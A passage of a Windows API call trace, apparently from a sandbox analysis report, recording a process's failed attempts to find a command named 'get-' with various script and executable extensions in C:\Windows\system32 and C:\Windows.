lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.371] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.JSE" (normalized: "c:\\windows\\system32\\get-\x9f.jse"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.372] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.372] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.WSF" (normalized: "c:\\windows\\system32\\get-\x9f.wsf"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.372] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.372] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.WSH" (normalized: "c:\\windows\\system32\\get-\x9f.wsh"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.373] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.373] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.MSC" (normalized: "c:\\windows\\system32\\get-\x9f.msc"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.373] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.374] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.CPL" (normalized: "c:\\windows\\system32\\get-\x9f.cpl"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.374] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.374] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f" (normalized: "c:\\windows\\system32\\get-\x9f"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.374] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.375] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.375] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.375] FindFirstFileW (in: lpFileName="C:\\Windows\\get-\x9f.ps1" (normalized: "c:\\windows\\get-\x9f.ps1"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.375] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.375] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.375] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.375] FindFirstFileW (in: lpFileName="C:\\Windows\\get-\x9f.psm1" (normalized: "c:\\windows\\get-\x9f.psm1"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.375] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.376] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.376] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.376] FindFirstFileW (in: lpFileName="C:\\Windows\\get-\x9f.psd1" (normalized: "c:\\windows\\get-\x9f.psd1"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.376] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.376] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.376] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.376] FindFirstFileW (in: lpFileName="C:\\Windows\\get-\x9f.COM" (normalized: "c:\\windows\\get-\x9f.com"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.376] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.376] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.377] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.377] FindFirstFileW (in: lpFileName="C:\\Windows\\get-\x9f.EXE" (normalized: "c:\\windows\\get-\x9f.exe"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.377] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.377] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.377] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.377] FindFirstFileW (in: lpFileName="C:\\Windows\\get-\x9f.BAT" (normalized: "c:\\windows\\get-\x9f.bat"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.377] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.377] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.378] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.378] FindFirstFileW (in: lpFileName="C:\\Windows\\get-\x9f.CMD" (normalized: "c:\\windows\\get-\x9f.cmd"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.378] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.378] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.378] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.378] FindFirstFileW (in: lpFileName="C:\\Windows\\get-\x9f.VBS" (normalized: "c:\\windows\\get-\x9f.vbs"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.378] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.378] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.378] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.379] FindFirstFileW (in: lpFileName="C:\\Windows\\get-\x9f.VBE" (normalized: "c:\\windows\\get-\x9f.vbe"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.379] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.379] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.379] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.379] FindFirstFileW (in: lpFileName="C:\\Windows\\get-\x9f.JS" (normalized: "c:\\windows\\get-\x9f.js"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.379] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.379] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.379] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.379] FindFirstFileW (in: lpFileName="C:\\Windows\\get-\x9f.JSE" (normalized: "c:\\windows\\get-\x9f.jse"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.380] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.380] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.380] GetFullPathNameW (in: 